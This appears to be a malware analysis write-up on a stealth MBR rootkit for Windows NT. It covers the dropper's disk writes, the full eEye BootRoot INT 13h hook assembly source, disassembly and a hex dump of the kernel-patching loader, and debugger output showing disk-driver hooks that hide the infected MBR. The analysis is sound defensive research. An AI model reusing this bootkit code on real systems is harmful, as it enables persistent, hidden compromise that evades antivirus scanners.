In 2005 Derek Soeder and Ryan Permeh, researchers from eEye Digital Security, presented eEye BootRoot. The technique used in their project wasn't new and had been popular in DOS times, but they first successfully used it in Windows NT Environment. The eEye Digital Security researchers skipped one part - BootRoot didn't hide the real content of affected sectors like old DOS Stealth MBR viruses, but it had only been created to show the possible way to compromise Windows NT OS.
Unfortunately, all the Windows NT family (including VISTA) still have the same security flaw - MBR can be modified from usermode. Nevertheless, MS blocked write-access to disk sectors from userland code on VISTA after the pagefile attack, however, the first sectors of disk are still unprotected !
At the end of 2007 stealth MBR rootkit was discovered by MR Team members (thanks to Tammy & MJ) and it looks like this way of affecting NT systems could be more common in near future if MBR stays unprotected.
"Good points" of being MBR rootkit:
How MBR rootkit works :
The installer of the rootkit writes the content of malicious kernel driver (244 736 bytes) to the last sectors of the disk (offset: 2 142 830 592) and then modifies sectors 0 (MBR), 60, 61 and 62.
The content of hidden sectors:
Below, the "Process Monitor" log shows sectors modified by the rootkit installer:
"39680","10:43:34,1365132","ldo2.tmp","848","CreateFile","\Device\Harddisk0\DR0","SUCCESS","Desired Access: Generic Read/Write, Disposition: Open, OpenResult: Opened" "39688","10:43:34,1419365","ldo2.tmp","848","DeviceIoControl","\Device\Harddisk0\DR0","FAST IO DISALLOWED","Control: IOCTL_DISK_GET_DRIVE_GEOMETRY" "39689","10:43:34,1419952","ldo2.tmp","848","DeviceIoControl","\Device\Harddisk0\DR0","SUCCESS","Control: IOCTL_DISK_GET_DRIVE_GEOMETRY" "39690","10:43:34,1424517","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 0, Length: 512, I/O Flags: Non-cached" "39769","10:43:34,2424965","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 2 142 830 592, Length: 512, I/O Flags: Non-cached" "39770","10:43:34,2492468","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 2 142 831 104, Length: 512, I/O Flags: Non-cached" "39771","10:43:34,2495318","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 2 142 831 616, Length: 512, I/O Flags: Non-cached" ... "40463","10:43:34,5546049","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 2 143 185 408, Length: 512, I/O Flags: Non-cached" "40679","10:43:34,7473241","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 30 720, Length: 512, I/O Flags: Non-cached" "40692","10:43:34,7854862","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 31 232, Length: 512, I/O Flags: Non-cached" "40705","10:43:34,7947558","ldo2.tmp","848","ReadFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 31 744, Length: 512, I/O Flags: Non-cached"
"40718","10:43:34,8035200","ldo2.tmp","848","WriteFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 2 142 830 592, Length: 244 736, I/O Flags: Non-cached" "40719","10:43:34,8152900","ldo2.tmp","848","WriteFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 30 720, Length: 512, I/O Flags: Non-cached" "40720","10:43:34,8252619","ldo2.tmp","848","WriteFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 31 232, Length: 512, I/O Flags: Non-cached" "40721","10:43:34,8265515","ldo2.tmp","848","WriteFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 31 744, Length: 512, I/O Flags: Non-cached" "40722","10:43:34,8277706","ldo2.tmp","848","WriteFile","\Device\Harddisk0\DR0","SUCCESS","Offset: 0, Length: 512, I/O Flags: Non-cached"
"40729","10:43:34,8335180","ldo2.tmp","848","CloseFile","\Device\Harddisk0\DR0","SUCCESS",""
The Rootkit dropper overwrites original MBR code and stores a copy in sector 62. The author of rootkit mostly used MBR loader code developed by eEye researchers, however the original code has been modified to patch the Windows kernel instead of NDIS driver.
rootkit MBR code |
original eEye MBR code |
;=============================================================== ; eEye BootRoot v0.90 Last updated: 08/08/2005 ;--------------------------------------------------------------- ; Demonstration of the capabilities of custom boot sector code ; on a Windows NT-family system. ; ; Derek Soeder - eEye Digital Security - 04/02/2005 ;=============================================================== .486p .model tiny BOOTORG EQU 7C00h ; our code is executed by the BIOS at 0000h:7C00h BOOTROOT_SIZE EQU 200h BOOTROOT GROUP BRCODE16, BRDATA ASSUME CS:BOOTROOT, DS:BOOTROOT, ES:BOOTROOT, SS:BOOTROOT BRCODE16 SEGMENT byte use16 @BRCODE16_START EQU $ ;################################### ;## Boot-Time Installation Code ## ;################################### ; ; Initialization ; |
|
cli xor bx, bx mov ss, bx mov ss:[BOOTORG - 2], sp mov sp, (BOOTORG - 2) push ds pushad |
|
mov ds, bx ; Reserve 1KB conventional memory for our memory-resident code dec word ptr ds:[0413h] ; 0040h:0013h - base memory size in KBs mov ax, ds:[0413h] shl ax, (10-4) ; AX *= 1024 / 16 (convert linear address in KBs to a segment) |
|
mov es, ax ; Copy ourselves to reserved memory and initialize the rest to zeroes cld mov si, BOOTORG xor di, di mov cx, BOOTROOT_SIZE / 2 rep movsw xor ax, ax mov ch, (1024 - BOOTROOT_SIZE) / 2 / 100h rep stosw |
|
; Install our INT 13h hook mov eax, ds:[bx + (13h*4)] mov es:[INT13HANDLER - @BRCODE16_START], eax ; store previous handler mov word ptr [bx + (13h*4)], @Int13Hook ; point INT 13h vector to our hook handler mov [bx + (13h*4) + 2], es ; (BX = 0 from earlier) ; Load and execute MBR from first hard drive (do this from resident code) push es push @BootFromHDD retf @BootFromHDD: sti mov es, cx ; CX = 0 from above REP STOSW mov ax, 0201h ; AL = number of sectors inc cx ; CH = cylinder; CL = sector and high bits of cylinder mov dx, 0080h ; DH = head; DL = drive number mov bh, (BOOTORG / 100h) ; ES:BX -> destination buffer int 13h ; INT 13h/AH=02h: Read sector(s) into memory popad pop ds pop sp db 0EAh ; JMP FAR 0000h:7C00h dw BOOTORG, 0000h |
|
;################################## ;## INT 13h Hook Real-Mode ISR ## ;################################## @Int13Hook: pushf cmp ah, 42h ; IBM/MS INT 13 Extensions - EXTENDED READ je short @Int13Hook_ReadRequest cmp ah, 02h ; DISK - READ SECTOR(S) INTO MEMORY je short @Int13Hook_ReadRequest popf db 0EAh ; JMP FAR INT13HANDLER INT13HANDLER EQU $ dd ? @Int13Hook_ReadRequest: mov byte ptr cs:[INT13LASTFUNCTION], ah ; Invoke original handler to perform read operation popf pushf ; push Flags because we're simulating an INT call dword ptr cs:[INT13HANDLER] ; call original handler jc short @Int13Hook_ret ; abort immediately if read failed pushf cli push es pusha mov ah, 00h INT13LASTFUNCTION EQU $-1 cmp ah, 42h jne short @Int13Hook_notextread lodsw lodsw ; +02h WORD number of blocks to transfer les bx, [si] ; +04h DWORD transfer buffer @Int13Hook_notextread: ; Scan sector for a signature of the code we want to modify test al, al jle short @Int13Hook_scan_done cld mov cl, al mov al, 8Bh shl cx, 9 ; (AL * 200h) mov di, bx @Int13Hook_scan_loop: ; 8B F0 MOV ESI, EAX ; 85 F6 TEST ESI, ESI ; 74 21 JZ $+23h ; 80 3D ... CMP BYTE PTR [ofs32], imm8 ; (the first 6 bytes of this signature exist in other modules!) repne scasb jne short @Int13Hook_scan_done cmp dword ptr es:[di], 74F685F0h jne short @Int13Hook_scan_loop cmp word ptr es:[di+4], 8021h jne short @Int13Hook_scan_loop mov word ptr es:[di-1], 15FFh ; FFh/15h/xx/xx/xx/xx: CALL NEAR [ofs32] mov eax, cs shl eax, 4 add cs:[(NDISBACKDOOR_LINEAR - @BRPATCHFUNC32_START) + BRCODE16_SIZE], eax add ax, (@PatchFunction - @BRPATCHFUNC32_START) + BRCODE16_SIZE mov cs:[PATCHFUNC32_LINEAR], eax ; should be okay to add to AX, since we can't cross 1KB boundary add ax, PATCHFUNC32_LINEAR - ((@PatchFunction - @BRPATCHFUNC32_START) + BRCODE16_SIZE) mov es:[di+1], eax @Int13Hook_scan_done: popa pop es popf @Int13Hook_ret: retf 2 ; discard saved Flags from original INT (pass back CF, etc.) @BRCODE16_END EQU $ BRCODE16_SIZE EQU (@BRCODE16_END - @BRCODE16_START) BRCODE16 ENDS |
MBR rootkit loader hooks INT 0x13 to control content of sectors loaded by NTLDR. It patches two areas of the kernel: the first contains the call of nt!IoInitSystem function and the second is the last page of the kernel image. At the beginning of start-up rootkit calls original nt!IoInitSystem function and then loads its own driver.
start end module name 804d7000 806ebc80 nt 806ebe00 806ebfff rootkit code 806ec000 806ffd80 hal
Patched kernel code |
Original kernel code |
806a0a79 0f85d9dcffff jne nt!Phase1Initialization+0x942 (8069e758) 806a0a7f e8f9650100 call nt!ExInitSystemPhase2 (806b707d) 806a0a84 6a19 push 0x19 806a0a86 e83af1e6ff call nt!InbvUpdateProgressBar (8050fbc5) 806a0a8b ffb590fbffff push dword ptr [ebp-0x470] 806a0a91 891d78cb5480 mov [nt!KdpTimeSlipPending (8054cb78)],ebx 806a0a97 e8cef30000 call nt!XIPInit (806afe6a) 806a0a9c 6a4b push 0x4b 806a0a9e 6a19 push 0x19 806a0aa0 e83cf1e6ff call nt!InbvSetProgressBarSubset (8050fbe1) 806a0aa5 ffb590fbffff push dword ptr [ebp-0x470] 806a0aab e850b30400 call 806ebe00 806a0ab0 84c0 test al,al 806a0ab2 0f84e7dcffff je nt!Phase1Initialization+0x9b9 (8069e79f) 806a0ab8 6a64 push 0x64 806a0aba 53 push ebx 806a0abb e821f1e6ff call nt!InbvSetProgressBarSubset (8050fbe1) 806a0ac0 391d007f5580 cmp [nt!InitSafeBootMode (80557f00)],ebx 806a0ac6 be3f000f00 mov esi,0xf003f 806a0acb 0f85d5dcffff jne nt!Phase1Initialization+0x9d9 (8069e7a6) 806a0ad1 381d142b5580 cmp [nt!InitIsWinPEMode (80552b14)],bl 806a0ad7 0f8563deffff jne nt!Phase1Initialization+0xb76 (8069e940) 806a0add 8bb590fbffff mov esi,[ebp-0x470] 806a0ae3 56 push esi 806a0ae4 6a02 push 0x2 806a0ae6 e82c020000 call nt!MmInitSystem (806a0d17) 806a0aeb 6a50 push 0x50 806a0aed e8d3f0e6ff call nt!InbvUpdateProgressBar (8050fbc5) 806a0af2 e8fb070000 call nt!KeI386VdmInitialize (806a12f2) 806a0af7 e8f11e0000 call nt!KiLogMcaErrors (806a29ed) 806a0afc 6a01 push 0x1 806a0afe e85cf1ffff call nt!PoInitSystem (8069fc5f) 806a0b03 84c0 test al,al 806a0b05 0f8419daffff je nt!Phase1Initialization+0x259 (8069e524) 806a0b0b 56 push esi |
806a0a79 0f85d9dcffff jne nt!Phase1Initialization+0x942 (8069e758) 806a0a7f e8f9650100 call nt!ExInitSystemPhase2 (806b707d) 806a0a84 6a19 push 0x19 806a0a86 e83af1e6ff call nt!InbvUpdateProgressBar (8050fbc5) 806a0a8b ffb590fbffff push dword ptr [ebp-0x470] 806a0a91 891d78cb5480 mov [nt!KdpTimeSlipPending (8054cb78)],ebx 806a0a97 e8cef30000 call nt!XIPInit (806afe6a) 806a0a9c 6a4b push 0x4b 806a0a9e 6a19 push 0x19 806a0aa0 e83cf1e6ff call nt!InbvSetProgressBarSubset (8050fbe1) 806a0aa5 ffb590fbffff push dword ptr [ebp-0x470] 806a0aab e844e6ffff call nt!IoInitSystem (8069f0f4) 806a0ab0 84c0 test al,al 806a0ab2 0f84e7dcffff je nt!Phase1Initialization+0x9b9 (8069e79f) 806a0ab8 6a64 push 0x64 806a0aba 53 push ebx 806a0abb e821f1e6ff call nt!InbvSetProgressBarSubset (8050fbe1) 806a0ac0 391d007f5580 cmp [nt!InitSafeBootMode (80557f00)],ebx 806a0ac6 be3f000f00 mov esi,0xf003f 806a0acb 0f85d5dcffff jne nt!Phase1Initialization+0x9d9 (8069e7a6) 806a0ad1 381d142b5580 cmp [nt!InitIsWinPEMode (80552b14)],bl 806a0ad7 0f8563deffff jne nt!Phase1Initialization+0xb76 (8069e940) 806a0add 8bb590fbffff mov esi,[ebp-0x470] 806a0ae3 56 push esi 806a0ae4 6a02 push 0x2 806a0ae6 e82c020000 call nt!MmInitSystem (806a0d17) 806a0aeb 6a50 push 0x50 806a0aed e8d3f0e6ff call nt!InbvUpdateProgressBar (8050fbc5) 806a0af2 e8fb070000 call nt!KeI386VdmInitialize (806a12f2) 806a0af7 e8f11e0000 call nt!KiLogMcaErrors (806a29ed) 806a0afc 6a01 push 0x1 806a0afe e85cf1ffff call nt!PoInitSystem (8069fc5f) 806a0b03 84c0 test al,al 806a0b05 0f8419daffff je nt!Phase1Initialization+0x259 (8069e524) 806a0b0b 56 push esi |
806ebd60 85 0c fe f8 ff 83 f8 10 0f 82 de fd f8 ff 83 7e ...............~ 806ebd70 0c 00 0f 85 f9 fd f8 ff e9 cf fd f8 ff e9 eb fd ................ 806ebd80 f8 ff 8b cf e8 07 64 ef ff e9 ed fd f8 ff 80 7d ......d........} 806ebd90 ff 00 0f 84 f0 fd f8 ff 8b 45 08 8b 40 0c 85 c0 .........E..@... 806ebda0 0f 84 ee 88 fa ff 8b 40 08 85 c0 0f 84 e3 88 fa .......@........ 806ebdb0 ff 6a 01 50 e8 8c 0d f0 ff e9 d6 88 fa ff ff 75 .j.P...........u 806ebdc0 f8 8d 85 cc fe ff ff 50 e8 36 a3 f4 ff e9 c8 fd .......P.6...... 806ebdd0 f8 ff 64 a1 24 01 00 00 ff 80 d4 00 00 00 0f 85 ..d.$........... 806ebde0 cc fd f8 ff 8d 48 34 39 09 0f 84 c1 fd f8 ff b1 .....H49........ 806ebdf0 01 c6 40 49 01 ff 15 54 06 40 00 e9 b0 fd f8 ff ..@I...T.@...... 806ebe00 8b 14 24 68 f4 f0 69 80 8b 0c 24 68 00 70 4d 80 ..$h..i...$h.pM. <--- hooked nt!IoInitSystem 806ebe10 0f 20 c0 50 25 ff ff fe ff 0f 22 c0 2b ca 58 0f . .P%.....".+.X. 806ebe20 22 c0 ff 34 24 68 62 e0 07 37 e8 3b 00 00 00 59 "..4$hb..7.;...Y 806ebe30 59 68 ab 01 00 00 6a 00 ff d0 60 e8 00 00 00 00 Yh....j...`..... 806ebe40 5e 83 c6 15 8b f8 6a 6a 59 f3 a5 b1 80 8d be 00 ^.....jjY....... 806ebe50 fe ff ff ff e0 33 c0 61 ff 74 24 0c ff 54 24 08 .....3.a.t$..T$. 806ebe60 59 5a 60 87 cd e8 52 00 00 00 60 8b 6c 24 28 8b YZ`...R...`.l$(. 806ebe70 45 3c 8b 54 05 78 03 d5 8b 4a 18 8b 5a 20 03 dd E<.T.x...J..Z .. 806ebe80 e3 32 49 8b 34 8b 03 f5 33 ff fc 33 c0 ac 3a c4 .2I.4...3..3..:. 806ebe90 74 07 c1 cf 0d 03 f8 eb f2 3b 7c 24 24 75 e1 8b t........;|$$u.. 806ebea0 5a 24 03 dd 66 8b 0c 4b 8b 5a 1c 03 dd 8b 04 8b Z$..f..K.Z...... 806ebeb0 03 c5 eb 02 33 c0 89 44 24 1c 61 c3 5b 55 68 b8 ....3..D$.a.[Uh. 806ebec0 74 29 85 ff d3 33 d2 52 52 8b f4 52 8b fc e8 26 t)...3.RR..R...& 806ebed0 00 00 00 5c 00 3f 00 3f 00 5c 00 50 00 68 00 79 ...\.?.?.\.P.h.y 806ebee0 00 73 00 69 00 63 00 61 00 6c 00 44 00 72 00 69 .s.i.c.a.l.D.r.i 806ebef0 00 76 00 65 00 30 00 00 00 68 24 00 26 00 8b cc .v.e.0...h$.&... 806ebf00 52 52 6a 40 51 52 6a 18 8b cc 6a 20 6a 03 56 51 RRj@QRj...j j.VQ 806ebf10 68 00 00 10 80 57 ff d0 55 68 62 e0 07 37 ff d3 h....W..Uhb..7.. 806ebf20 97 55 68 16 d5 fc 84 ff d3 89 06 68 00 00 00 00 .Uh........h.... 806ebf30 68 00 00 b9 7f 8b cc 6a 00 51 b9 00 bc 03 00 51 h......j.Q.....Q 806ebf40 51 6a 00 ff d7 50 56 8b ce 96 33 d2 52 52 52 ff Qj...PV...3.RRR. 806ebf50 74 24 58 ff 11 55 68 5f 4c d4 dc ff d3 ff 74 24 t$X..Uh_L.....t$ 806ebf60 40 ff d0 8b 46 3c 03 c6 50 8b 50 50 52 52 6a 00 @...F<..P.PPRRj. 806ebf70 ff d7 97 59 57 32 c0 f3 aa 5f 58 60 8b 48 54 f3 ...YW2..._X`.HT. 806ebf80 a4 61 2b c6 03 c7 0f b7 48 06 8d 90 f8 00 00 00 .a+.....H....... 806ebf90 60 03 72 14 03 7a 0c 8b 4a 10 e3 02 f3 a4 61 83 `.r..z..J.....a. 806ebfa0 c2 28 e2 ec 50 60 8b fe 91 b9 00 ef 00 00 f3 ab .(..P`.......... 806ebfb0 61 55 68 1f 9d 48 9d ff d3 95 56 ff d5 8b 74 24 aUh..H....V...t$ 806ebfc0 08 ff b4 24 84 00 00 00 57 8b 46 28 03 c7 ff d0 ...$....W.F(.... 806ebfd0 0b c0 7d 0e 8b 4e 50 e3 09 32 c0 57 f3 aa 5f 57 ..}..NP..2.W.._W 806ebfe0 ff d5 83 c4 60 33 c0 8b fb 83 ef 15 b9 9c 01 00 ....`3.......... 806ebff0 00 f3 aa 61 c2 04 00 00 00 00 00 00 00 00 00 00 ...a............ 806ec000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 MZ.............. <--- 806ec000 806ffd80 hal 806ec010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 806ec020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 806ec030 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 ................ 806ec040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 ........!..L.!Th 806ec050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f is program canno 806ec060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 t be run in DOS 806ec070 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 mode....$.......
806ebe00 8b1424 mov edx,[esp] 806ebe03 68f4f06980 push 0x8069f0f4 806ebe08 8b0c24 mov ecx,[esp] 806ebe0b 6800704d80 push 0x804d7000 806ebe10 0f20c0 mov eax,cr0 806ebe13 50 push eax 806ebe14 25fffffeff and eax,0xfffeffff 806ebe19 0f22c0 mov cr0,eax ; disable code write protection 806ebe1c 2bca sub ecx,edx 806ebe1e 58 pop eax 806ebe1f 0f22c0 mov cr0,eax 806ebe22 ff3424 push dword ptr [esp] 806ebe25 6862e00737 push 0x3707e062 806ebe2a e83b000000 call 806ebe6a 806ebe2f 59 pop ecx 806ebe30 59 pop ecx 806ebe31 68ab010000 push 0x1ab 806ebe36 6a00 push 0x0 806ebe38 ffd0 call eax {nt!ExAllocatePool (8050fd66)} 806ebe3a 60 pushad 806ebe3b e800000000 call 806ebe40 806ebe40 5e pop esi 806ebe41 83c615 add esi,0x15 806ebe44 8bf8 mov edi,eax 806ebe46 6a6a push 0x6a 806ebe48 59 pop ecx 806ebe49 f3a5 rep movsd 806ebe4b b180 mov cl,0x80 806ebe4d 8dbe00feffff lea edi,[esi-0x200] 806ebe53 ffe0 jmp eax {81bf06d0}
81bf06d0 33c0 xor eax,eax 81bf06d2 61 popad 81bf06d3 ff74240c push dword ptr [esp+0xc] 81bf06d7 ff542408 call dword ptr [esp+0x8]{nt!IoInitSystem (8069f0f4)} ss:0010:f9e6383c=8069f0f4 81bf06db 59 pop ecx 81bf06dc 5a pop edx 81bf06dd 60 pushad 81bf06de 87cd xchg ebp,ecx 81bf06e0 e852000000 call 81bf0737 81bf06e5 60 pushad 81bf06e6 8b6c2428 mov ebp,[esp+0x28] 81bf06ea 8b453c mov eax,[ebp+0x3c] 81bf06ed 8b540578 mov edx,[ebp+eax+0x78] 81bf06f1 03d5 add edx,ebp 81bf06f3 8b4a18 mov ecx,[edx+0x18] 81bf06f6 8b5a20 mov ebx,[edx+0x20] 81bf06f9 03dd add ebx,ebp 81bf06fb e332 jecxz 81bf072f 81bf06fd 49 dec ecx 81bf06fe 8b348b mov esi,[ebx+ecx*4] 81bf0701 03f5 add esi,ebp 81bf0703 33ff xor edi,edi 81bf0705 fc cld 81bf0706 33c0 xor eax,eax 81bf0708 ac lodsb 81bf0709 3ac4 cmp al,ah 81bf070b 7407 jz 81bf0714 81bf070d c1cf0d ror edi,0xd 81bf0710 03f8 add edi,eax 81bf0712 ebf2 jmp 81bf0706 81bf0714 3b7c2424 cmp edi,[esp+0x24] 81bf0718 75e1 jnz 81bf06fb 81bf071a 8b5a24 mov ebx,[edx+0x24] 81bf071d 03dd add ebx,ebp 81bf071f 668b0c4b mov cx,[ebx+ecx*2] 81bf0723 8b5a1c mov ebx,[edx+0x1c] 81bf0726 03dd add ebx,ebp 81bf0728 8b048b mov eax,[ebx+ecx*4] 81bf072b 03c5 add eax,ebp 81bf072d eb02 jmp 81bf0731 81bf072f 33c0 xor eax,eax 81bf0731 8944241c mov [esp+0x1c],eax 81bf0735 61 popad 81bf0736 c3 ret
81bf077f 51 push ecx 81bf0780 52 push edx 81bf0781 6a18 push 0x18 81bf0783 8bcc mov ecx,esp 81bf0785 6a20 push 0x20 81bf0787 6a03 push 0x3 81bf0789 56 push esi 81bf078a 51 push ecx 81bf078b 6800001080 push 0x80100000 81bf0790 57 push edi kd> r eax=805715e7 ebx=81bf06e5 ecx=f9e637ec edx=00000000 esi=f9e63810 edi=f9e6380c kd> dt -r nt!_OBJECT_ATTRIBUTES f9e637ec +0x000 Length : 0x18 +0x004 RootDirectory : (null) +0x008 ObjectName : 0xf9e63804 "\??\PhysicalDrive0" +0x000 Length : 0x24 +0x002 MaximumLength : 0x26 +0x004 Buffer : 0x81bf074e "\??\PhysicalDrive0" +0x00c Attributes : 0x40 +0x010 SecurityDescriptor : (null) +0x014 SecurityQualityOfService : (null) 81bf0791 ffd0 call eax {nt!NtOpenFile (805715e7)} 81bf0793 55 push ebp 81bf0794 6862e00737 push 0x3707e062 81bf0799 ffd3 call ebx {81bf06e5} 81bf079b 97 xchg eax,edi 81bf079c 55 push ebp 81bf079d 6816d5fc84 push 0x84fcd516 81bf07a2 ffd3 call ebx {81bf06e5} 81bf07a4 8906 mov [esi],eax 81bf07a6 6800000000 push 0x0 81bf07ab 680000b97f push 0x7fb90000 ; offset of the first sector = 2 142 830 592 81bf07b0 8bcc mov ecx,esp 81bf07b2 6a00 push 0x0 81bf07b4 51 push ecx 81bf07b5 b900bc0300 mov ecx,0x3bc00 81bf07ba 51 push ecx 81bf07bb 51 push ecx 81bf07bc 6a00 push 0x0 81bf07be ffd7 call edi {nt!ExAllocatePool (8050fd66)} 81bf07c0 50 push eax 81bf07c1 56 push esi 81bf07c2 8bce mov ecx,esi 81bf07c4 96 xchg eax,esi 81bf07c5 33d2 xor edx,edx 81bf07c7 52 push edx 81bf07c8 52 push edx 81bf07c9 52 push edx 81bf07ca ff742458 push dword ptr [esp+0x58] 81bf07ce ff11 call dword ptr [ecx]{nt!NtReadFile (80571b30)} ds:0023:f9e63810=80571b30 81bf07d0 55 push ebp 81bf07d1 685f4cd4dc push 0xdcd44c5f 81bf07d6 ffd3 call ebx {81bf06e5} 81bf07d8 ff742440 push dword ptr [esp+0x40] 81bf07dc ffd0 call eax {nt!NtClose (805675d9)} 81bf07de 8b463c mov eax,[esi+0x3c] 81bf07e1 03c6 add eax,esi 81bf07e3 50 push eax 81bf07e4 8b5050 mov edx,[eax+0x50] 81bf07e7 52 push edx 81bf07e8 52 push edx 81bf07e9 6a00 push 0x0 81bf07eb ffd7 call edi {nt!ExAllocatePool (8050fd66)} 81bf07ed 97 xchg eax,edi 81bf07ee 59 pop ecx 81bf07ef 57 push edi 81bf07f0 32c0 xor al,al 81bf07f2 f3aa rep stosb 81bf07f4 5f pop edi 81bf07f5 58 pop eax 81bf07f6 60 pushad 81bf07f7 8b4854 mov ecx,[eax+0x54] 81bf07fa f3a4 rep movsb 81bf07fc 61 popad 81bf07fd 2bc6 sub eax,esi 81bf07ff 03c7 add eax,edi 81bf0801 0fb74806 movzx ecx,word ptr [eax+0x6] 81bf0805 8d90f8000000 lea edx,[eax+0xf8] 81bf080b 60 pushad 81bf080c 037214 add esi,[edx+0x14] 81bf080f 037a0c add edi,[edx+0xc] 81bf0812 8b4a10 mov ecx,[edx+0x10] 81bf0815 e302 jecxz 81bf0819 81bf0817 f3a4 rep movsb 81bf0819 61 popad 81bf081a 83c228 add edx,0x28 81bf081d e2ec loop 81bf080b 81bf081f 50 push eax 81bf0820 60 pushad 81bf0821 8bfe mov edi,esi 81bf0823 91 xchg eax,ecx 81bf0824 b900ef0000 mov ecx,0xef00 81bf0829 f3ab rep stosd 81bf082b 61 popad 81bf082c 55 push ebp 81bf082d 681f9d489d push 0x9d489d1f 81bf0832 ffd3 call ebx {81bf06e5} 81bf0834 95 xchg eax,ebp 81bf0835 56 push esi 81bf0836 ffd5 call ebp {nt!ExFreePool (8054b7aa)} 81bf0838 8b742408 mov esi,[esp+0x8] 81bf083c ffb42484000000 push dword ptr [esp+0x84] 81bf0843 57 push edi 81bf0844 8b4628 mov eax,[esi+0x28] 81bf0847 03c7 add eax,edi 81bf0849 ffd0 call eax {81951946} <--- driver's entry point 81bf084b 0bc0 or eax,eax 81bf084d 7d0e jge 81bf085d 81bf084f 8b4e50 mov ecx,[esi+0x50] 81bf0852 e309 jecxz 81bf085d 81bf0854 32c0 xor al,al 81bf0856 57 push edi 81bf0857 f3aa rep stosb 81bf0859 5f pop edi 81bf085a 57 push edi 81bf085b ffd5 call ebp 81bf085d 83c460 add esp,0x60 81bf0860 33c0 xor eax,eax 81bf0862 8bfb mov edi,ebx 81bf0864 83ef15 sub edi,0x15 81bf0867 b99c010000 mov ecx,0x19c 81bf086c f3aa rep stosb 81bf086e 61 popad 81bf086f c20400 ret 0x4
To hide the real content of MBR and other sectors from AV scanners rootkit hooks "\Driver\Disk" IRP_MJ_READ. Normally, when API reads sector 0 (MBR), rootkit modifies disk IRP_MJ_READ call and returns copy of original MBR stored in sector 62. The second hook (IRP_MJ_WRITE) protects it from being deleted/overwritten.
---- Devices - GMER 1.0.13 ---- Device \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_READ 81831410 Device \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_WRITE 81831410 ---- Threads - GMER 1.0.13 ---- Thread 4:2032 81837EE8 Thread 4:2036 81830E44 Thread 4:2040 81836496 Thread 4:120 81867A90 Thread 4:1716 818552E0 Thread 4:124 8189B9D0 Thread 4:160 81841540 Thread 4:232 818362A0 ---- EOF - GMER 1.0.13 ----
kd> dt -r _DEVICE_OBJECT 81be1ab8 +0x000 Type : 3 +0x002 Size : 0x518 +0x004 ReferenceCount : 0 +0x008 DriverObject : 0x81b92510 +0x000 Type : 4 +0x002 Size : 168 +0x004 DeviceObject : 0x81be0310 +0x000 Type : 3 +0x002 Size : 0x368 +0x004 ReferenceCount : 0 +0x008 DriverObject : 0x81b92510 +0x00c NextDevice : 0x81be1ab8 +0x010 AttachedDevice : (null) +0x014 CurrentIrp : (null) +0x018 Timer : (null) +0x01c Flags : 0xd0 +0x020 Characteristics : 0x100 +0x024 Vpb : 0x81be0288 +0x028 DeviceExtension : 0x81be03c8 +0x02c DeviceType : 7 +0x030 StackSize : 5 '' +0x034 Queue : __unnamed +0x05c AlignmentRequirement : 1 +0x060 DeviceQueue : _KDEVICE_QUEUE +0x074 Dpc : _KDPC +0x094 ActiveThreadCount : 0 +0x098 SecurityDescriptor : 0xe13c9d90 +0x09c DeviceLock : _KEVENT +0x0ac SectorSize : 0x200 +0x0ae Spare1 : 0 +0x0b0 DeviceObjectExtension : 0x81be0678 +0x0b4 Reserved : (null) +0x008 Flags : 0x12 +0x00c DriverStart : 0xf9a7c000 +0x010 DriverSize : 0x8e00 +0x014 DriverSection : 0x81bf1ca0 +0x018 DriverExtension : 0x81b925b8 +0x000 DriverObject : 0x81b92510 +0x004 AddDevice : 0xf9a94ec0 CLASSPNP!ClassAddDevice+0 +0x008 Count : 1 +0x00c ServiceKeyName : _UNICODE_STRING "Disk" +0x014 ClientDriverExtension : 0x81b92388 +0x018 FsFilterCallbacks : (null) +0x01c DriverName : _UNICODE_STRING "\Driver\Disk" +0x000 Length : 0x18 +0x002 MaximumLength : 0x18 +0x004 Buffer : 0xe1403358 "\Driver\Disk" +0x024 HardwareDatabase : 0x8068de90 "\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM" +0x000 Length : 0x5a +0x002 MaximumLength : 0x5c +0x004 Buffer : 0x805ceb98 "\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM" +0x028 FastIoDispatch : (null) +0x02c DriverInit : 0xf9a838ab disk!GsDriverEntry+0 +0x030 DriverStartIo : (null) +0x034 DriverUnload : 0xf9a9353a CLASSPNP!ClassUnload+0 +0x038 MajorFunction : [28] 0xf9a92c30 CLASSPNP!ClassCreateClose+0 +0x00c NextDevice : (null) +0x010 AttachedDevice : 0x81be0020 +0x000 Type : 3 +0x002 Size : 0x1c8 +0x004 ReferenceCount : 0 +0x008 DriverObject : 0x81bd4748 +0x000 Type : 4 +0x002 Size : 168 +0x004 DeviceObject : 0x81be0020 +0x008 Flags : 0x12 +0x00c DriverStart : 0xf9cd4000 +0x010 DriverSize : 0x4900 +0x014 DriverSection : 0x81bf1de0 +0x018 DriverExtension : 0x81bd47f0 +0x01c DriverName : _UNICODE_STRING "\Driver\PartMgr" +0x024 HardwareDatabase : 0x8068de90 "\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM" +0x028 FastIoDispatch : (null) +0x02c DriverInit : 0xf9cd7880 PartMgr!DriverEntry+0 +0x030 DriverStartIo : (null) +0x034 DriverUnload : 0xf9cd49a1 